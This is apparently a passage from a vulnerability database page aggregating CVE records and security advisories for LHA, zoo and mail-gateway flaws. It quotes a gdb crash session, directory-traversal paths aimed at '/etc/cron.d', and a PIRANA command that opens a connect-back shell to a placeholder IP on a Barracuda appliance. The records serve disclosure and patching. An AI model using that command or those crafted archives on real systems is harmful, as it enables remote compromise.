              "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
            },
            {
              "name": "5753",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/5753"
            },
            {
              "name": "oval:org.mitre.oval:def:977",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
            },
            {
              "name": "FEDORA-2004-119",
              "refsource": "FEDORA",
              "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
            },
            {
              "name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
            },
            {
              "name": "10243",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/10243"
            },
            {
              "name": "ADV-2006-1220",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1220"
            },
            {
              "name": "20040501 LHa buffer overflows and directory traversal problems",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
            },
            {
              "name": "19514",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19514"
            },
            {
              "name": "5754",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/5754"
            },
            {
              "name": "RHSA-2004:179",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
            },
            {
              "name": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt",
              "refsource": "MISC",
              "url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
            },
            {
              "name": "FLSA:1833",
              "refsource": "FEDORA",
              "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
            },
            {
              "name": "DSA-515",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2004/dsa-515"
            },
            {
              "name": "oval:org.mitre.oval:def:9881",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
            },
            {
              "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
            },
            {
              "name": "GLSA-200405-02",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
            },
            {
              "name": "RHSA-2004:178",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
            },
            {
              "name": "lha-multiple-bo(16012)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
            },
            {
              "name": "20040502 Lha local stack overflow Proof Of Concept Code",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0234",
    "datePublished": "2004-05-05T04:00:00",
    "dateReserved": "2004-03-17T00:00:00",
    "dateUpdated": "2024-08-08T00:10:03.930Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0053
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:01
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use fields that use RFC2047 encoding, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:01:23.649Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          },
          {
            "name": "mime-rfc2047-filtering-bypass(17331)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17331"
          },
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2047 encoding issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109520704408739\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use fields that use RFC2047 encoding, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        },
        {
          "name": "mime-rfc2047-filtering-bypass(17331)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17331"
        },
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2047 encoding issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109520704408739\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0053",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use fields that use RFC2047 encoding, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            },
            {
              "name": "mime-rfc2047-filtering-bypass(17331)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17331"
            },
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME RFC2047 encoding issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109520704408739\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0053",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2004-01-14T00:00:00",
    "dateUpdated": "2024-08-08T00:01:23.649Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-2328
Vulnerability from cvelistv5
Published
2005-08-16 04:00
Modified
2024-08-08 01:22
Severity ?
Summary
Clearswift MAILsweeper for SMTP before 4.3_13 allows remote attackers to cause a denial of service (infinite loop) via an e-mail with a crafted RAR archive attached.
References
http://www.secunia.com/advisories/10732/third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/3742vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/14979vdb-entry, x_refsource_XF
http://www.securityfocus.com/bid/9556vdb-entry, x_refsource_BID
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T01:22:13.583Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "10732",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://www.secunia.com/advisories/10732/"
          },
          {
            "name": "3742",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/3742"
          },
          {
            "name": "mailsweeper-smtp-rar-dos(14979)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14979"
          },
          {
            "name": "9556",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/9556"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-01-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper for SMTP before 4.3_13 allows remote attackers to cause a denial of service (infinite loop) via an e-mail with a crafted RAR archive attached."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "10732",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://www.secunia.com/advisories/10732/"
        },
        {
          "name": "3742",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/3742"
        },
        {
          "name": "mailsweeper-smtp-rar-dos(14979)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14979"
        },
        {
          "name": "9556",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/9556"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-2328",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper for SMTP before 4.3_13 allows remote attackers to cause a denial of service (infinite loop) via an e-mail with a crafted RAR archive attached."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "10732",
              "refsource": "SECUNIA",
              "url": "http://www.secunia.com/advisories/10732/"
            },
            {
              "name": "3742",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/3742"
            },
            {
              "name": "mailsweeper-smtp-rar-dos(14979)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14979"
            },
            {
              "name": "9556",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/9556"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-2328",
    "datePublished": "2005-08-16T04:00:00",
    "dateReserved": "2005-08-16T00:00:00",
    "dateUpdated": "2024-08-08T01:22:13.583Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0121
Vulnerability from cvelistv5
Published
2003-03-13 05:00
Modified
2024-08-08 01:43
Severity ?
Summary
Clearswift MAILsweeper 4.x allows remote attackers to bypass attachment detection via an attachment that does not specify a MIME-Version header field, which is processed by some mail clients.
References
http://marc.info/?l=bugtraq&m=104716030503607&w=2mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/316311mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/7044vdb-entry, x_refsource_BID
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T01:43:36.003Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20030307 Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=104716030503607\u0026w=2"
          },
          {
            "name": "20030326 RE: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/316311"
          },
          {
            "name": "7044",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/7044"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2003-03-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper 4.x allows remote attackers to bypass attachment detection via an attachment that does not specify a MIME-Version header field, which is processed by some mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20030307 Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=104716030503607\u0026w=2"
        },
        {
          "name": "20030326 RE: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/316311"
        },
        {
          "name": "7044",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/7044"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0121",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper 4.x allows remote attackers to bypass attachment detection via an attachment that does not specify a MIME-Version header field, which is processed by some mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20030307 Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=104716030503607\u0026w=2"
            },
            {
              "name": "20030326 RE: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachment evasion issue",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/316311"
            },
            {
              "name": "7044",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/7044"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0121",
    "datePublished": "2003-03-13T05:00:00",
    "dateReserved": "2003-03-03T00:00:00",
    "dateUpdated": "2024-08-08T01:43:36.003Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

var-200408-0140
Vulnerability from variot

Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates.

These vulnerabilities are related to: SA11510 SA19002

Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------

LHa buffer overflows and directory traversal problems

PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)

  • DESCRIPTION *

LHa is a console-based program for packing and unpacking LHarc archives.

It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.

  • OVERVIEW *

LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.

By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:

$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt

0 0x55555555 in ?? ()

Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt

0 0x55555555 in ?? ()

Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $

b) two directory traversal problems

LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".

  • ATTACHED FILES *

I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.

  • TIMELINE *

18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory

// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/

.

TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow

SECUNIA ADVISORY ID: SA19002

VERIFY ADVISORY: http://secunia.com/advisories/19002/

CRITICAL: Moderately critical

IMPACT: DoS, System access

WHERE:

From remote

SOFTWARE: zoo 2.x http://secunia.com/product/8297/

DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive).

The vulnerability has been confirmed in version 2.10. Other versions may also be affected.

SOLUTION: Restrict use to trusted ZOO archives.

PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux

ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

. Topic: Barracuda LHA archiver security bug leads to remote compromise

Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234

I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:

  • Anti-spam
  • Anti-virus
  • Anti-spoofing
  • Anti-phishing
  • Anti-spyware (Attachments)
  • Denial of Service

II. DESCRIPTION

When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program.

Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for successfull exploitation.

For further informations about the details of the bugs, you can consult OSVDB

5753 and #5754 .

III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall

IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1

V. SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006.

They also published an official patch in firmware #3.3.03.022, available April 3rd 2006.

It is recommended to update to firmware #3.3.03.022 .

VI. CREDITS

Ulf Harnhammar who found the original LHA flaw.

Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework.

VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234

VIII. HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
